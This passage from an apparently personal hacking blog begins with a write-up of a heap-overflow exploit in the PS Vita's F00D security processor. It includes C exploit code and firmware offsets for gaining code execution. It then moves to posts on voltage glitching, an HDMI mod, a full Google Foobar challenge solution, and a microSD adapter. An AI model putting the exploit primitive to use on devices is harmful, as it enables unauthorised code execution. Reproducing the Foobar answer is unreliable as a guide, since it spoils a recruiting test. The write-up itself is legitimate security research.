  }

  return 0;
}

The easier path as hinted earlier is that args->total_count is never used in create_batch. Let’s look back at what this means. In handle_0x50002, we malloc a buffer of size entries * sizeof(bigmac_op_t)) + 31. entries is returned from get_entries, which in LV1 mode is just args->total_count. However, in create_batch, we use args->list_count as the iterator to write to each entry. That means as long as args->list_count > args->total_count, we have a heap overflow! Now let’s look at how we exploit this.

F00D heap

The update service uses a very simple heap structure. Each heap block contains a 24-byte header and is part of a doubly-linked list. There is no fancy allocation algorithm. There are only two global lists: used and free. Blocks are broken up on malloc and coalesced on free (if there are adjacent free blocks). Blocks are moved from one list to another for malloc and free and are always sorted in order of address. This is what the header looks like:

typedef struct heap_hdr {
  void *data; // point to after `next`
  uint32_t size;
  uint32_t size_aligned;
  uint32_t padding;
  struct heap_hdr *prev;
  struct heap_hdr *next;
} __attribute__((packed)) heap_hdr_t;

When the applet is first started, a 0x4000 byte buffer is set aside to be used for the heap. Both the used and free list are empty.

Let’s say we make a 0x50002 command call in LV1 only mode and args->total_count = 2. That will result in a malloc(2*32+31). Since the empty list is free, we get a large chunk from the initial buffer.

Now we break that chunk into two pieces: the block the heap allocator returns and a free block that is added to the free list. A 24-byte header is added to both blocks in order to keep track of block metadata.

We zoom into these blocks to see how they are laid out. Notice that we have enough space for two bigmac_op_t as well as some extra space reserved by the alignment.

Now let’s assume we set args->list_count = 4 to trigger a heap overflow. Since args->total_count = 2, we will begin to overwrite some of that extra padding and eventually hit the adjacent free block and start to overwrite the block header. Again, this is because create_batch uses args->list_count when writing to the buffer while handle_0x50002 uses args->total_count to allocate the buffer.

In the diagram above, the dotted outlines represents the two extra blocks create_batch writes. The third block is not too interesting because it mainly overwrites the padding space and some of the free block metadata. The fourth overflow block is the one we’ll use to exploit the applet. Notice how batch[3].length overwrites the prev pointer and batch[3].operation overwrites the next pointer. We fully control batch[3].length because it comes from args->list.lv1[3].length and we partially control batch[3].operation because it is always set to 0x2000.

Now that we control these two pointers, let’s shift our focus to free which will attempt to coalesce these two blocks after freeing the used block because they will be adjacent free blocks. There is code that is similar to the following:

void free(void *buf) {
...
  heap_hdr_t *cur, *adjacent;

  cur = (heap_hdr_t *)cur;
  adjacent = (heap_hdr_t *)(buf + cur->size_aligned);

  // remove from used list
  list_unlink(g_heap_used, cur);

  if (is_in_list(g_heap_free, adjacent)) {
    // remove adjacent from list
    adjacent->prev->next = adjacent->next;
    adjacent->next->prev = adjacent->prev;
    // coalesce
    cur->aligned_size += adjacent->aligned_size + sizeof(heap_hdr_t);
    cur->size = cur->aligned_size;
    // add to free list
    list_link(g_heap_free, cur);
  }
...
}

If we focus on the line adjacent->prev->next = adjacent->next we can see that this is equivalent to *(uint32_t *)batch[3].size = batch[3].operation due to the heap overflow. As explained above, we control both of these fields so in effect, it becomes *(uint32_t *)args->list.lv1[3].length = 0x2000.

At this point, it should be noted that Toshiba MeP processors have two features (or lack of) that makes our lives much easier. First, an invalid memory access will be ignored. This means when we execute the next line adjacent->next->prev = adjacent->prev and notice that adjacent->next->prev is an invalid pointer, we are still fine. Second, there is no memory protection, so we can write directly into executable memory without issue. With that in mind, we can get code execution like we are living in 1990.

Exploiting

Using the heap overflow, we can develop a primitive to corrupt arbitrary F00D memory from ARM by writing 0x2000 to it.

int corrupt(int ctx, uint32_t addr) {
  int ret = 0, sm_ret = 0;
  cmd_0x50002_t args = {0};

  // construct the arguments
  args.use_lv2_mode = 0;
  args.list_count = 3;
  args.total_count = 1;
  // we used 4 blocks in the example to illustrate how things work
  // but actually 3 blocks is enough to trigger the vulnerability

  // first two valid entries to pass whitelist checks
  // we make them arbitrary valid values
  args.list.lv1[0].addr = 0x50000000;
  args.list.lv1[0].length = 0x10;
  args.list.lv1[1].addr = 0x50000000;
  args.list.lv1[1].length = 0x10;
  // here is our overflow entry, which fails checks but does not matter
  // because the free block header is overwritten and free is called 
  // even when there is an error since this is the last entry
  args.list.lv1[2].addr = 0;
  args.list.lv1[2].length = addr - offsetof(heap_hdr_t, next);

  ret = sceSblSmCommCallFunc(ctx, 0x50002, &sm_ret, &args, sizeof(args));
  if (sm_ret < 0) {
    return sm_ret;
  }
  return ret;
}

0x2000 in MeP assembly becomes bsetm ($0),0x0 which does bit-setting. However, that is not important because we can effectively treat it as a NOP and replace arbitrary instructions with this one to bypass checks. Next, we “wrote” our own memcpy by taking an existing command handler in the applet and nopping out instructions until it acted like a memcpy.

// offsets for 1.692, overwrites cmd 0x60002
corrupt(ctx, 0x0080B904);
corrupt(ctx, 0x0080B938);
corrupt(ctx, 0x0080B948);
corrupt(ctx, 0x0080B94C);
corrupt(ctx, 0x0080B950);
corrupt(ctx, 0x0080B958);
corrupt(ctx, 0x0080B95C);
corrupt(ctx, 0x0080B914);
corrupt(ctx, 0x0080B918);

Finally, we need to trigger an icache flush by calling some random command (making it fetch new instructions and evict old cache entries). Then we can memcpy our F00D code in and run it! Overall this was a simple vulnerability and there were no exploit mitigation in place. However, it would have been much more difficult to find this vulnerability and exploit it blind. Most of the security in F00D comes from the fact that it has a small attack surface as well as the fact that the interface and software are all proprietary. Once you look at the code though, attacking it becomes a lot less intimidating.

Injecting Software Vulnerabilities with Voltage Glitching

2019-01-10T00:00:00-08:00

I am not a fan of New Year’s resolutions, but I do want to do more technical writing this year. So here is a preprint of a paper I wrote on glitching the PS Vita as well as a simple model for reasoning about voltage glitches at a low level.

Vita HDMI Mod (Attempt)

2017-12-31T00:00:00-08:00

For the last couple of months, I’ve been developing an HDMI mod for the Vita on my free time. I thought it would be a fun project to practice my hardware design skills even though the end product would not be too useful (the VitaTV already exists). Unfortunately, this project did not end in success but I want to write about it anyways so you can see what I’ve been doing with some of the leftover money from my adapter project.

Overview

The Vita’s SoC (named Kermit) has two MIPI DSI output ports. On OLED units, the first port is connected to a custom 40-pin high speed board-to-board connector that mates with an AMS495QA01 OLED panel. On LCD units, the same port goes to a ZIF connector. The second port is unused on handheld Vitas and is connected to an ADV7533 on the PSTV. On development kits, both ports are used (one to OLED and another to ADV7533) and I suspect that’s why the SoC has two ports in the first place. I would like to comment here that the Kermit SoC does not have native support for HDMI/TMDS signaling and therefore any rumors of handheld Vita consoles having HDMI output capabilities are false. No, that “mystery port” does not have video output capabilities (it is a USB host port with a custom physical connector).

Can we hook up the unused MIPI DSI port? Unfortunately no because those pins are not routed so it is impossible to get to them, so instead the idea is to “hijack” the DSI output to the OLED panel and let the same signals drive a custom board that can convert it to HDMI. This requires us to solder some wires to the video signals and thanks to the OLED datasheet along with some connectivity tests, it was easy to locate test points for the desired signals.

ngptv

My original idea is to use the same components as the PSTV, namely the ADV7533 MIPI DSI to HDMI conversion chip. It is the only ASIC on the market that does this so there was little choice. Using some other implementation as reference, I drew up a schematic for the board including the recommended circuits to adhere to HDMI standards.

A couple of big problems quickly came up that made this design infeasible

I wanted to expose a mini-HDMI port on the bottom of the OLED Vita right next to the multi-connector. There is unused space inside the Vita near that region but it is only about 15mm x 15mm. That means all the components I choose will have to be extremely space efficient and therefore expensive.
The ADV7533 only comes in a 49-BGA package which means layout requires at least a 6 layer board with low pitch and drill sizes. This means that prototyping the boards will be very expensive. A normal 2 layer PCB with standard drills can be fabricated for about $10 for each prototype run. A 6 layer board with small drill sizes goes for about $300 for each prototype run.
I do not have the equipment to solder and test small pitch BGA parts which I would have to use to meet the space constraints.
You cannot buy the ADV7533 from standard US suppliers because the part is under NDA and requires you to have a HDMI license which costs thousands of dollars per year.

Since I do not plan to produce these boards at a profit, I cannot justify investing the time and money for this design. However, another approach presented itself to me.

ngptv lite

ST makes an adapter board for their MCU evaluation boards (which only has MIPI DSI support) to hook up to external displays. We can easily purchase these for $30 a pop (no license or NDA required) and then build a custom “host” board for it. That’s exactly what I did. I built a small 15mm x 15mm breakout board that can be placed into the Vita and soldered 36AWG wires from the testpoints to the breakout board. Then I built a “host” board that connects to my breakout board and the ST adapter. The host board also has pins to connect to my RaspberryPi so I can power it as well as program the ADV7533. It quickly became a colorful mess of wires.

Wiring the breakout board.

RaspberryPi and what the adapter looks like.

Everything connected together.

Driver

Since the ADV7533 is under NDA, Analog Devices does not give out the programming guide to the public. This makes no sense because there are quite a few open source implementations out there:

By looking at the different implementations, I was able to piece together the proper configuration flow (as well as find benign bugs and wrong comments in different implementation leading me to believe not all the drivers above were original work). I wrote the I2C configuration sequence as a Python script to run on the RPI, which was able to communicate with the ADV7533 successfully.

However, no video showed up on screen. It’s time to bring out the oscilloscope.

Debugging

After sniffing the clock lanes with my oscilloscope, I’ve noticed something strange: the clock signal is off every 30us.

The MIPI D-PHY specifications defines two modes: HS (high-speed) and LP (low-power). In HS mode (also called video mode for MIPI DSI), the clock lanes act as a high speed differential clock while the data lanes transfer the data. This is typically used to send each frame. In LP mode (also called command mode for MIPI DSI), the video source and sink can communicate during v-blank periods and send auxiliary information. The clock lanes are not used when the data lanes are in LP mode and therefore to save battery, the clock lanes can also enter LP mode and is seen as off. Unfortunately, the ADV7533 datasheet states the following on the first page:

The DSI Rx implements DSI video mode operation only.

This implies that there is no logic to handle the clock lane LP transition. To test this hypothesis, I used xerpi’s vita-baremetal to set up the MIPI DSI clock the same way the PSTV does and sure enough I see in my oscilloscope that the clock no longer turns off and I can see test patterns on the screen.

Cursory tests shows that the Vita OLED does not like the clock running continuously so it does not seem possible to have the OLED and HDMI working at the same time. I also don’t want to limit the adapter to only working with hacked Vitas, so I thought to find another way. I tried asking around to see if there is some magical IC that can derive a fixed clock that is phase synced to the pixel clock but stays on. Initially I thought I found a solution with jitter attenuators/cleaners but then I was told by an engineer that a jitter cleaner would average out the clock rather than ignore the “off” periods. It would be way too expensive to build a custom solution using FPGA or op-amps and PLLs that can handle > 250MHz differential signals.

Redesign

Nevertheless, I decided to redesign my host board just to hone my design skills (which is the whole point of the project anyways). I wanted my board to be the same size as the ST board and have the connectors align so they can sit on top of each other. I also added a MIPI DSI redriver with a configurable equalizers. This ensures the video signal going to the ST adapter is clean. Finally, I added a microcontroller so I can program in the I2C configuration sequence for the redriver and ADV7533 without needing a RPI. The end result was a pretty packed board.

The microcontroller is not soldered on as it is easier to debug by connecting to my RPI.

What it looks like stacked.

Top down view.

Future

I don’t plan to pursue this project any further because I got the experience I wanted out of it. However, for people who are interested in continuing where I left off, the designs are open source. I think there are a couple of ways going forward.

If you only care about hacked Vitas, you can try to get the existing design to work with a custom driver that sets the auto clock configuration to output to the screen or to the external adapter. You can also try to find the test-points on a Vita slim. Finally, if you want sound, you need to find the an I2S output somewhere.
If you want to try another part, you can look at one of various MIPI DSI to eDP chips (for example this) and chain it with a DP to HDMI chip or with a DP cable. Make sure the chip you’re using supports LP mode!
If you want to design your own part using a FPGA, that might be the best route but you need to make sure your FPGA supports MIPI D-PHY, which most likely it won’t and you’ll have to make a level translation circuit. I think this is what the existing Vita video out mod does.

Foobar, Blossoms, and Isomorphism

2017-09-13T00:00:00-07:00

A friend recently invited me to participate in Foobar, Google’s recruiting tool that lets you solve interesting (and sometimes not-so-interesting) programming problems. This particular problem, titled “Distract the Guards” was very fun to solve but I found no good write-ups about it online! Solutions exist but it is rather hard to understand how the author came upon the solution. I thought I might take a shot and go into detail into how I approached it–as well as give proofs of correctness as needed.

Disclaimer: If you are participating in Foobar (hello googler) or have aspirations to do so in the future, please stop here in the spirit of the challenge. It’s well known that Google has a finite pool of problems so you will miss out if you just read the solution.

To begin, here is the problem statement:

Distract the Guards
===================

The time for the mass escape has come, and you need to distract the guards so
that the bunny prisoners can make it out! Unfortunately for you, they're
watching the bunnies closely. Fortunately, this means they haven't realized yet
that the space station is about to explode due to the destruction of the
LAMBCHOP doomsday device. Also fortunately, all that time you spent working as
first a minion and then a henchman means that you know the guards are fond of
bananas. And gambling. And thumb wrestling.

The guards, being bored, readily accept your suggestion to play the Banana
Games.

You will set up simultaneous thumb wrestling matches. In each match, two guards
will pair off to thumb wrestle. The guard with fewer bananas will bet all their
bananas, and the other guard will match the bet. The winner will receive all of
the bet bananas. You don't pair off guards with the same number of bananas (you
will see why, shortly). You know enough guard psychology to know that the one
who has more bananas always gets over-confident and loses. Once a match begins,
the pair of guards will continue to thumb wrestle and exchange bananas, until
both of them have the same number of bananas. Once that happens, both of them
will lose interest and go back to guarding the prisoners, and you don't want
THAT to happen!

For example, if the two guards that were paired started with 3 and 5 bananas,
after the first round of thumb wrestling they will have 6 and 2 (the one with 3
bananas wins and gets 3 bananas from the loser). After the second round, they
will have 4 and 4 (the one with 6 bananas loses 2 bananas). At that point they
stop and get back to guarding.

How is all this useful to distract the guards? Notice that if the guards had
started with 1 and 4 bananas, then they keep thumb wrestling! 1, 4 -> 2, 3 -> 4,
1 -> 3, 2 -> 1, 4 and so on.

Now your plan is clear. You must pair up the guards in such a way that the
maximum number of guards go into an infinite thumb wrestling loop!

Write a function answer(banana_list) which, given a list of positive integers
depicting the amount of bananas the each guard starts with, returns the fewest
possible number of guards that will be left to watch the prisoners. Element i of
the list will be the number of bananas that guard i (counting from 0) starts
with.

The number of guards will be at least 1 and not more than 100, and the number of
bananas each guard starts with will be a positive integer no more than
1073741823 (i.e. 2^30 -1). Some of them stockpile a LOT of bananas.

Languages
=========

To provide a Python solution, edit solution.py
To provide a Java solution, edit solution.java

Test cases
==========

Inputs:
    (int list) banana_list = [1, 1]
Output:
    (int) 2

Inputs:
    (int list) banana_list = [1, 7, 3, 21, 13, 19]
Output:
    (int) 0

Now I love a good story and I love a challenging problem but the two fit together like chocolate and eggplant parmesan but I digress. If you parse through the bananas and thumb wrestling, it is easy to see that this is a combinatorics problem. The first thing to do is to break the large problem into some smaller ones that can be pieced together. Here we see that a key piece is figuring out, for any two given guards, if they will go into an infinite loop or not. Once we figure that out, the second part is to find which guards can be paired into infinite loops such that a maximum number of guards end up in infinite loops. Let’s solve the second part first.

Maximum Matching

Assume we have a predicate $willLoop(x,y)$ for two guards, each with $x$ bananas and $y$ bananas that returns true if the pair will loop. Can we then pair up all the guards optimally so we have the most number of infinite loops? Note once we have this, the answer will be simple: just return the total number of guards minus the number of guards that are paired up into infinite loops.

What if we just brute-force and try to find every possible pairing? We take one guard and try to pair her with another guard and if they don’t loop, we try pairing her with a different guard. This will find us a solution but how do we find a maximum one where the most number of guards are paired off? Well, we can then try to find every possible set of pairings. How long will that take? Let’s say there are $n$ guards. Then it will take $O(n^2)$ time to find one set of pairings. To find every possible pairing, notice that once we pair off two guards, those two guards cannot be used to pair with anyone else. So for every pairing in every solution set of pairings, we can remove that particular pair, reassign the remaining pairings, and be left with another potential solution. This means the whole process could take $O(2^{n^2})$ time to process! Clearly infeasible.

At this point we should take a step back and approach this another way. Instead of trying to find an algorithm to solve this specific problem, we should try to cast it into an existing problem. To do so, we need to find a structure that can hold the problem together. The word “graph” should be screaming at you right now and indeed this looks perfect for a graph: we have a set of guards (nodes) where any two guards are related (edge) by $willLoop$. Let’s draw out a graph for the second test case.

Here we labeled each node (guard) by the number of bananas they start with. We draw an edge between two guards if $willLoop$ is true between them. What does it mean to have a set of pairings? If the pairings are a set of edges, that means each node can have at most one edge in the pairing. Here is an example of a set of pairings.

Notice that the guard with 13 bananas and the guard with 19 bananas are not paired with anyone. We cannot select an edge for either of them because doing so means that one of the already colored nodes will have two edges in the solution set, which is not allowed. However, we can find a better set of pairings.

Now every guard is paired up and therefore we know the fewest number of guards that won’t infinite loop is zero. This is a simple example where we can find the solution visually but what if there are 100 guards? What if the solution is greater than zero? How will we know when we reached the minimum and there is no better set of pairings? Most importantly, is it even possible to solve this problem in sub-exponential time (otherwise our solution will be infeasible and we get the dreaded execution time out error)? Turns out these exact questions have been asked by computer scientists for many decades. It is a problem in graph theory called perfect matching, which can be reduced to a closely related problem of maximum matching. Formally, a maximum matching can be defined thus: given a graph $G=(V,E)$, find a largest set $S \subseteq E$ where for each $v \in V$, there is at most one $s \in S$ such that $v \in s$. Note I say “a largest set” because there can be multiple sets of equal cardinality that is maximum.

In the 1960s, Jack Edmonds lit the algorithms world on fire by finding a polynomial time (specifically $O(V^2E))=O(n^3)$) algorithm to solve perfect matching for any graph. His “blossom algorithm” as it came to be called is not a simple one and I won’t attempt to explain it here. If you want to know more about how it works, it’s presented at an undergraduate level by Professor Roughgarden in these notes. The upshot is that we can apply this algorithm directly to our graph to get the maximum matching. A quick Google search for a Python implementation turns up this page.

Now all that’s left is to define $willLoop(x,y)$.

Loop Detection

Our intuitive approach will be dead simple: let’s just simulate the game until either it ends or we detect a loop. How will we detect a loop? We could keep a list of “seen counts of bananas” and after each round we check to see if the current counts has previously been seen. If so, we know we are in a loop because the same sequence of banana counts will proceed. Otherwise, at some point we will see both players end up with the same number of bananas. How well does this perform? If $n$ is the total number of bananas “in play” (the sum of the two players’ banana at the start), then we see that the most number of turns would be $O(n)$ turns because after $n$ turns, you would have to either see both players have the same count or see every single count of bananas and therefore must repeat one such count. But $n$ could be as large as $2^{30}-1$ so this will not do. It’s sub-linear or bust!

We wish to find a formula (predicate) for predicting the outcome of the game without playing it. To start, let’s just write down a couple of examples and try to find patterns. Below, each line $(x,y)$ is a round of the banana thumb wrestling game where $x$ and $y$ are the number of bananas currently in each player’s possession. I’ll list a couple of games below, both with and without loops.

(3,5)
(6,2)
(4,4)

(5,7)
(10,2)
(8,4)
(4,8)
(8,4)
...

(1,4)
(2,3)
(4,1)
(3,2)
(1,4)
...

(3,13)
(6,10)
(12,4)
(8,8)

You can smell the hint of a pattern although it may not be obvious yet. Let’s try to suss out the scent. We know there is some periodic structure (groups, you say?) but how do we go from one line to the next without following the complex rule? Is there an easier way to generate this sequence? Well if at first you don’t succeed, try and change domains. Notice a key fact: the sum of the bananas in each round is always the same. This may be obvious considering no bananas are created or destroyed in each round–let’s call it the Law of Conservation of Bananas. With that in mind, let’s work in $\pmod n$ where $n=x+y$. Note that when working with numbers modulo $n$, negative numbers $-y$ are the same as $n-y$.

(3,-3) % 8
(6,-6) % 8
(4,4)  % 8

(5,-5) % 12
(-2,2) % 12
(-4,4) % 12
(4,-4) % 12
(-4,4) % 12
...

(1,-1) % 5
(2,-2) % 5
(4,-4) % 5
(-2,2) % 5
(1,-1) % 5
...

(3,-3) % 16
(6,-6) % 16
(-4,4) % 16
(8,8)  % 16

Do you see it? We notice two facts. First, by how we defined $n$, we have $x=-y \pmod n$. This is a given. The more important fact is that we can see that each round is exactly two times the previous round $\pmod n$. This seems like an important fact but it doesn’t appear to give us an answer immediately. We also made a lot of assumptions that seems to be unstable and although we might have found a pattern–it might also be a red herring. I am a strong proponent of what I call the 3-examples rule which is: if something works for three random examples you make up, it probably works for all integers. QED. However, until the mathematics community accepts my rule as law, we unfortunately must do things the old fashioned way.

My first tool of choice, as always, is group theory because it’s easy but sounds hard so that maximizes the show-off factor. Let’s formalize this game into a group whose elements can be generated by the group operator. We will see later that the advantage of this is that we can dangle from the shoulder of giants and not have to prove anything major. Lets define group $\mathcal{G}[n]$ on $n$ with elements $e=(x \pmod n, y \pmod n)$ and the operator $\oplus$ which we will now construct.

In constructing $\oplus$ we note that the only elements we care about how the operator works for is $(x,y) \oplus (x,y)$ (from here on, we drop the $\pmod n$ when obvious for brevity). We want to say something like “if we apply $\oplus$ to $(x,y)$ for $t$ times, then we get element $(u,v)$ which is the result of playing $t$ rounds of the banana thumb wrestling game”. We do not care (for now) what $\oplus$ does to other element pairs. Let’s formalize this

\[\begin{aligned} (x,y) \oplus (x,y) &= \begin{cases} (x-y, 2y) & x > y \\ (2x,y-x) & x < y \\ (x,y) & x = y \end{cases} \\ &= \begin{cases} (x-(n-x), 2(n-x)) & x > y \\ (2x,(n-x)-x) & x < y \\ (x,(n-x)) & x = y \end{cases} \\ &= (2x,-2x) \\ &= (2x,2y) \end{aligned}\]

Note we start with the definition of the game and apply the Law of Conservation of Bananas to remove the $y$ dependency. Then we apply the modulus and simplify to get our final form of $(2x,2y)$. Note this shouldn’t be surprising given our initial intuition. Now comes the point again where we want to turn our problem into something more familiar. It’s easy to see that $\mathcal{G}[n]$ is a valid group but we want to cast the subgroup generated by $(x,y)$ to be isomorphic to something well known (like the additive group $\pmod n$). Why? So we can do cool complex stuff like multiplication and division without worrying about all the pesky details like “is this a ring?”. With that in mind, lets complete the definition of $\oplus$ to be $(x_1,y_1) \oplus (x_2,y_2) \equiv (x_1+x_2 \pmod n,y_1+y_2 \pmod n)$. You are now convinced that this general definition is consistent with what we have for our special case above.

So it turns out our $\oplus$ is just $+$, big deal right? Well turns out this is exactly the additive group $\pmod n \times \pmod n$, but that is not too important. What’s important is that our subgroup is isomorphic to the additive group $\pmod n$. I won’t give the proof here because there is little substance but notice that $(2x \pmod n, 2y \pmod n) \equiv (2x \pmod n, -2x \pmod n)$ since $n=x+y$ by construction. That means we drop the $y$ dependency. Again, this should all feel redundant because we got to this point from our intuition which gave strong indication that this is correct.

Going back to the game, we see that at round $t$, we can find $(x,y)^{t}$ by taking $x \cdot 2^t \pmod n$. Now we can define the predicate

\[willLoop(x,y) = \forall t, x \cdot 2^t \not \equiv n/2 \pmod n\]

If this was math class then we would be done. But as programmers, we don’t care about the existence of solutions–we want the damn solution! So how do we get something closed form? With a little manipulation the above turns to

\[\begin{aligned} willLoop(x,y) &= \forall t, x \cdot 2^t \not \equiv 0 \pmod n \\ &= \forall t, \widetilde{n} \nmid x \cdot 2^t \\ &= \widetilde{n} \nmid x \end{aligned}\]

Where $\widetilde{n}$ is just $n$ with all factors of 2 removed (for example if $n=112$ then $\widetilde{n}=7$). (If you have not seen $\nmid$ before, it means “does not divide”). Immediately follows is an algorithm for $willLoop(x,y)$:

def willLoop(x, y):
    n = x+y
    n_tilde = n
    while n_tilde % 2 == 0:
        n_tilde = n_tilde / 2
    return (x % n_tilde) != 0

It is easy to see that the only work in this algorithm is dividing $n$ and that happens at most $\log(n)$ times so this runs in $O(\log(n))$ time. In fact, for all intents and purposes, this is really $O(1)$ time since the while-loop is just trimming out the leading 0 bits of the binary representation of $n$. However, don’t say that to a computer scientist unless you want to be hit on the head with a word-ram-model (pretty heavy).

Appendix A

Here is the full solution without the Python implementation of Edmonds’ blossom algorithm

def willLoop(x, y):
    n = x+y
    n_tilde = n
    while n_tilde % 2 == 0:
        n_tilde = n_tilde / 2
    return (x % n_tilde) != 0

def bananaGraph(banana_list):
    G = {i: [] for i in range(len(banana_list))}
    for i, a in enumerate(banana_list):
        for j, b in enumerate(banana_list):
            if i != j and willLoop(a, b):
                G[i].append(j)
    return G

def answer(banana_list):
    G = bananaGraph(banana_list)
    matches = matching(G)
    return len(banana_list) - len(matches)

print answer([1, 1])
print answer([1, 7, 3, 21, 13, 19])
print answer([1])
print answer([1, 7, 1, 1])

psvsd: Custom Vita microSD card adapter

2017-08-22T00:00:00-07:00

One thing I love about Vita hacking is the depth of it. After investing so much time reverse engineering the software and hardware, you think you would run out of things to hack. Each loose end leads to another month long project. This all started in the development of HENkaku Ensō. We wanted an easy way to print debug statements early in boot. UART was a good candidate because the device initialization is very simple and the protocol is standard. The Vita SoC (likely called Kermit internally as we’ll see later on) has seven UART ports. However, it is unlikely they are all hooked up on a retail console. After digging through the kernel code, I found that bbmc.skprx, the 3G modem driver contain references to UART. After a trusty FCC search, it turns out that the Vita’s 3G modem uses a mini-PCIe connector but with a custom pin layout and a custom form factor. The datasheet gives some useful description for each pin, and UART_KERMIT seemed like the most likely candidate (there’s also UART_SYSCON which is connected to the SCEI chip on the bottom of the board, which serves as a system controller and a UART_EXT which is not hooked up on the Vita side). So finding a debug output port was a success, but with the datasheet in front of me, the USB port caught my attention. Wouldn’t it be neat to put in a custom USB device?

On USB in the Vita

A quick aside on the various USB ports found in the different models of the Vita.

The top port on OLED models (commonly referred to as the “mystery port” and incorrectly referred to as a “hidden video out port”) is a USB host. It is unknown if the port is enabled by default or how to enable it.
The bottom port on OLED models (sometimes called the “multiconnector”) supports UDC (USB client) but can also enable USB host support. It is unknown how this switch is controlled, but I’m guessing the syscon is involved and it’s likely USB OTG.
The microUSB port on LCD models have the ID pin connected which implies support for USB OTG or something like it. However, it is unknown how to activate this feature.
There is a USB type A port on PS TV.
There is also a USB to Ethernet chip in the PS TV for the Ethernet port that is connected to Kermit via USB.
The audio codec chip is connected to Kermit via USB for all models.
and of course, the 3G modem on OLED models is connected by USB. On Wifi only models, VDD to the unfilled mini-PCIe pad is missing a bridge. The USB D+/D- signals are also missing a ferrite bead under the adjacent shield. It is unknown if bridging these three locations will enable the USB port on wifi models or if extra work is needed.

Designing a microSD adapter

In order to become more familiar with hardware design as well as understand how USB works on the Vita, I thought it would be fun to create a custom Vita USB device that fits on the modem port. The main reason I chose this port aside from the other USB ports is that it is the easiest to build. It is just a matter of designing and fabricating a PCB, which is simple to do. In comparison, connecting to any of the other USB ports would require creating custom adapters, molding plastic, and dealing with mechanical issues. Creating an adapter for the external ports is also not exactly a usable solution as the Vita is supposed to be portable, and having to dangle a USB port is not something most people are willing to do. In addition, my custom Vita modem card can expose the UART port to work as a console output device (which started this whole project). For this first project, I wanted to build a microSD adapter. Vita memory cards are notoriously expensive, with 32GB cards retailing for $79.99 USD. In comparison, a microSD card with similar performance and capacity goes for $12 USD. Therefore, it would be immensely useful to use microSD cards as a USB storage replacement for the proprietary Vita memory cards.

Choosing parts

SD to USB ICs are pretty cheap and common–you find them in any USB SD adapter. A quick research shows that most cheap adapters use an Alcor or Genesys chip. There is also the MAX14500 series chip from Maxim that is no longer in production and the Microchip USB2244 chip. The documentation for the cheap Asia manufactured chips were lacking so I went with the USB2244 even though it is more expensive (I don’t plan to mass produce it anyways). Microchip provides good documentation in comparison, complete with layout guidelines and a reference design. Unfortunately, I can’t find an Eagle library for the USB2244 so I had to design it myself (using Sparkfun’s tutorial).

Next, I needed an Eagle part for the Vita modem form factor. Luckily, I found a good part for mini-PCIe and was able to modify it to the custom size that Vita uses thanks to the drawing in the datasheet.

Schematic

Next is connecting the parts together. Having no experience whatsoever, I turned again to Sparkfun’s tutorials. Copying the reference design, I came up with a board with the microSD adapter and pin headers for the UART.

Layout

I learned board layout again from Sparkfun making sure to follow the design guidelines from Microchip. I also cheated by looking at the layout for the reference board and ensuring that relative distance between objects match from my design. The main challenge is in routing because of the constrained size, but through some creativity, I managed to hook everything up.

Manufacturing

Next step is to produce some prototypes. Thankfully this is extremely easy in this day and age. Pcbshopper allows you to choose your design requirements and it will search across many PCB manufacturers for the best price. The price (plus shipping) is similar across many Chinese manufacturers–about $15 for 10 boards with standard options. The catch is slow lead time and even slower shipping. Throughout the project, I’ve tried EasyEda, SeeedStudio, DirtyPCBs, and PCBway. Below is a mini-review of my experiences with each fab.

I used DirtyPCBs for the breakout adapters. The shipping time is the fastest per dollar (using the cheapest shipping rate, I got the package in two and a half weeks). The board quality was good but a couple of the adapters had the PCIe connector cut improperly and therefore won’t fit the Vita without some sanding. There was no problem with the wiring or drills even though I used the smallest allowed sizes.

I purchased the first three prototypes from SeeedStudios because their website was the easiest to use and the cleanest of everyone on PCBshopper. The cheapest shipping was slow (took almost a month to arrive) and more than half the adapters I received had the PCIe connectors not cut properly. I found no electrical problems.

EasyEDA had the best quality of all the fabs I’ve used. All the cuts were good and the drill holes were very precise and exactly centered. They do not offer cheap shipping and build time was a couple days longer than their estimate of 2-4 days. I also ordered a stencil from them and that came out great as well.

PCBway would be my recommended fab. Although the quality was not as excellent as EasyEDA, it was still better than the other fabs (no issues with the connector). They also do not offer cheap shipping but their build time is a couple day faster than EasyEDA. More importantly, PCBway offers a competitive rate (5x cheaper than SeeedStudios) for PCB assembly and eventually became the fab that produced the final production run for this project.

Prototyping

What’s the most cost effective way to debug the design? Considering how cheap it is to build these boards, it is no surprise that the best way to debug is to build another board. I created a second mini-PCIe based design–this time with a mini-PCIe socket on the card to act as a breakout board. Because the design for the breakout board is simple, the only requirement to verify the board is to do connectivity test on each pin after it arrives. Then I can probe the pads on the breakout port to debug the signals on the main design.

Using the breakout board, I can inspect the signals from the 3G modem in anticipation of some sort of custom handshake protocol. Fortunately, there wasn’t such a sequence and the USB port works as-is. When the first boards came back (a month of waiting), I was able to test it by connecting the USB pads on the breakout board to a USB cable and connect the psvsd card to the computer.

Immediately, I found some errors and fixed it in the design. Having a test plan ready by the time the boards arrived really sped up the process.

Funding

The nice thing about software hacking as a hobby is that it costs nothing but time. But for this hardware hack, I have spent a little over $100 on this project in parts, supplies, and boards. That’s less than buying two video games, so I have no qualms about the cost, but considering the interest the community showed, I think it would be more than fair to spread the cost across everyone who is interested. My idea is this: I will make a limited production of 100 boards (no more because I will be shipping the packages myself and it’s fairly laborious). These boards will be sold at cost and an extra $1 will be added to cover my expenses. I have heard many horror stories of crowd funding gone wrong, so I took many steps to ensure that this will be a success.

First, I made a spreadsheet covering all the costs: supplies, boards, shipping materials, platform fees, etc. Then I added a $100 buffer for any extraneous expenses (another prototype run, for example). Next, I made sure to be very clear upfront about what contributors are paying for: the supplies for me to develop this project. Because undoubtedly, manufacturing 100 boards at such a low cost will not have a perfect yield, I know a small number of these boards will have defects. I don’t have the time or money to deal with customer service for these issues, so part of the low price of the boards is that each contributor takes some amount of risk that their board is defective. Finally, I set a fixed goal so I do not receive the money until after 60 days. I am spending my own money in the meantime. My hope is that after 60 days, I’ll either complete the project and use the unlocked money to reimburse myself and fund the limited production. Or, I’ll run into some major unresolvable issue, in which I will refund everyone and just lose the ~$200 I spent so far. However, after a month of steady progress I felt confident enough to take 400 more orders for a total of 500. Then after getting lots of good samples from the fab I also felt it was fine to test and ensure that every adapter works before shipping it out.

The feedback was tremendous, and the funding goal was met in a day after it was posted. That gives me enough confidence and motivation to continue the project and ensure it is a success.

Software

